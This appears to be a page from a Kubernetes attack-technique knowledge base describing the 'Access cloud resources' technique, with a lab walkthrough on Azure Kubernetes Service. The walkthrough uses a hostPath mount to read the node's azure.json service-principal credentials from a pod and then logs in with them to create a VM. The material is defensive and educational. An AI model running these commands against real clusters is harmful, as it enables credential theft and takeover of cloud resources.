Initial access Execution Persistence Privilege escalation Defense evasion Credential access Discovery Lateral movement Collection Impact
Using Cloud Exec into Container Backdoor Container Privileged Container Clear Container Logs List K8s secrets Access the K8s API server Access cloud resources Images from a private repository Data Destruction
Compromised images in registry bash/cmd in container Writable hostPath mount Cluster-admin binding Delete k8s events Mount service principal Access Kubelet API Container service account Ressource hijacking
Kubeconfig file New container Kubernetes CronJob hostPath mount Pod / container name similarity Access container service account Network mapping Cluster internal networking Denial of Service
Application vulnerability Application exploit (RCE) Malicious admission controller Access cloud resources Connect from proxy server Applications credentials in configuration files Access Kubernetes dashboard Applications credentials in configuration files
Exposed sensitive interfaces SSH server running in inside container Disable Namespacing Access managed identity credentials Instance metadata API Writable volume mounts on the host
Sidecar injection Malicious admission controller CoreDNS poisoning
ARP poisoning and IP spoofing

Access cloud resources

If the Kubernetes cluster is deployed in the cloud, in some cases attackers can leverage their access to a single container in order to get access to other cloud resources outside the cluster. For example, in AKS each node contains service principal credential that is stored in /etc/kubernetes/azure.json. AKS uses this service principal to create and manage Azure resources that are needed for the cluster operation.

By default, the service principal has contributor permissions in the cluster’s Resource Group. Attackers who get access to this service principal file (by hostPath mount, for example) can use its credentials to access or modify the cloud resources.

Example

The following is an example on how to break out of the context of a Kubernetes cluster running in Azure Kubernetes Service (AKS) to gain access to a broader range of resources in Azure. For this we leverage a hostPath mount (see “Writable hostPath mount” for details).

In the Azure Cloud Shell we create a new service principal.

$ az ad sp create-for-rbac --name myAKSClusterServicePrincipal
The output includes credentials that you must protect. Be sure that you do not include these credentials in your code or check the credentials into your source control. For more information, see https://aka.ms/azadsp-cli

{
  "appId": "a89f4db3-...",
  "displayName": "myAKSClusterServicePrincipal",
  "password": "[REDACTED]",
  "tenant": "[REDACTED]"
}

Assign the Contributor role to the service principal. This is done often but not necessary for normal operation (at least not without a more limited scope).

$ az role assignment create --assignee a89f4db3-e832-4f74-8188-3af923e96b08 --role Contributor

Now we create a new AKS Kubernetes cluster (test in our case is an already existing resource group and the values for --service-principal and --client-secret need to be replaced with the actual values from the command above).

$ az aks create \
--resource-group test \
--name myAKSCluster \
--service-principal <appId> \
--client-secret <password>

Once the cluster setup has completed we get a kubeconfig for our new cluster.

$ az aks get-credentials --resource-group test --name myAKSCluster

The next step is to gain access to a worker node’s local filesystem like described in “Writable hostPath mount” (we won’t repeat this again here) and assume our pod is called my-pod.

$ kubectl exec -it my-pod -- cat /host/etc/kubernetes/azure.json
{
    "cloud": "AzurePublicCloud",
    "tenantId": "[REDACTED]",
    "subscriptionId": "[REDACTED]",
    "aadClientId": "a89f4db3-...",
    "aadClientSecret": "[REDACTED]",
    ...

As a next step we can use the gathered credentials to authenticate.

$ az logout
Logout successful. Re-login to your initial Cloud Shell identity with 'az login --identity'. Login with a new identity with 'az login'.
$ az login --service-principal -u <appId> --password <password> --tenant <tenant>

From this point on the only limitation is the service principal’s actual access permissions and roles. As an example we can create a new virtual machine.

$ az vm create \
--resource-group test \
--name myVM \
--image UbuntuLTS
{
  "fqdns": "",
  "id": "/subscriptions/[REDACTED]/resourceGroups/test/providers/Microsoft.Compute/virtualMachines/myVM",
  "location": "switzerlandnorth",
  "macAddress": "00-22-48-61-B2-96",
  "powerState": "VM running",
  "privateIpAddress": "10.0.0.4",
  "publicIpAddress": "20.199.177.43",
  "resourceGroup": "test",
  "zones": ""
}

References